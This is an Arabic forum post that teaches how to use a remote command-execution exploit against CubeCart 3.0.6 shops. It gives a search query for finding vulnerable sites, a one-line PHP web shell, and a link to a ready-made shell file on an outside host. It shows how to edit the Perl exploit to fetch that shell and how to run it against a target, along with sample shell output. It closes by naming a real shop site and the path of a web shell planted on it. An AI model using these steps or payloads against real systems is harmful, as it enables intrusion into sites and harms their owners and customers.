السلام عليكم ورحمة الله وبركاتة
هذا الشرح بعضة من اخوي متكي
والباقي تجميييع
هذي ثغرة جديد من نوع كوماند ,, تنفيذ اوامر على السيرفر ,, يعني اللي يحبون الشل ,, وهي على برنامج CubeCart 3.0.6
وللبحث عن مواقع مصابه اضغط الرابط التالي ,,
http://www.google.com.sa/search?hl=a...+3.0 .6&meta=
تاريخ الثغره 30/12/2005 ,, قبل يومين ,,
لتحميل الثغره بملف البيرل (اضغط هنا)
الحين نجي للشغل العملي ,, بعد ماحملتو الملف نروح نفتحه بالمفكره ونعدل عليه حاجه ,, وهي مسار ملف التكست حقك اللي يحتوي على الداله اللي تبيها ,,
والطريقه كتالي ,,
اول شي سو لك ملف بالمفكره واكتب فيه التالي ,,
<?php
system($cmd);
?>
واحفظه بمتداد txt وارفعه على اي موقع ,, طبعا تقدر تحط الداله اللي تبيها انا حطيت هنا system ,, في الثغره كاتبين حط
كود PHP:
رمز:
<?passthru($_GET[cmd]);?>
عاد على حسب السيرفر اللي بتتعامل معه ,,
المهم انا وفرت لكم المشوار وهذا رابط للملف .txt جاهز ,,
http://www.gulflobby.com/lobby/upload/cR.txt
بعد ماتفتح ملف الثغره بتحصل السطر التالي ,,
كود PHP:
كود PHP:
$host = $opt_h;
$dirs = $opt_d;
$shel = "http://website.com/cmd.txt"; # cmd shell url
$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
$good = 0;
تعدل فيه بحيث يكون كذا
كود PHP:
كود PHP:
$host = $opt_h;
$dirs = $opt_d;
$shel = "http://www.gulflobby.com/lobby/upload/cR.txt"; # cmd shell url
$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
$good = 0;
وتحفظ التعديل ,,
طبعا من غير الخطوه اللي فوق ماراح تشتغل الثغره وهذا بنائا على تجربه ,,
الحين نروح نشغل الثغره على الموقع اللي نبيه بالطريقه التاليه ,,
كود PHP
كود PHP:
1398.pl -h www.aaa.com -d /cubaa
بعدين بيطلع لك كذا ,,
[cijfer@www.xxx.com /]$
نكتب كذا
كود PHP:
كود PHP:
[cijfer@www.xxx.com /]$ id;uname -a
وبيعطيك النتيجه ,,
كود PHP:
كود PHP:
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686
,,
الان ان شا الله فهمتو الدرس
والآن للعملي
اولا نحدد الموقع
مثال
http://www.ebix.co.uk/shop/
ثم نسوي زي الصووورة
ثم
اتمنى تكونو فهمتو وهذا شيل هدية مني لكم
http://www.ebix.co.uk/shop/includes/webadmin.php
تحياتي
الصفر البار د
النمط الخطي
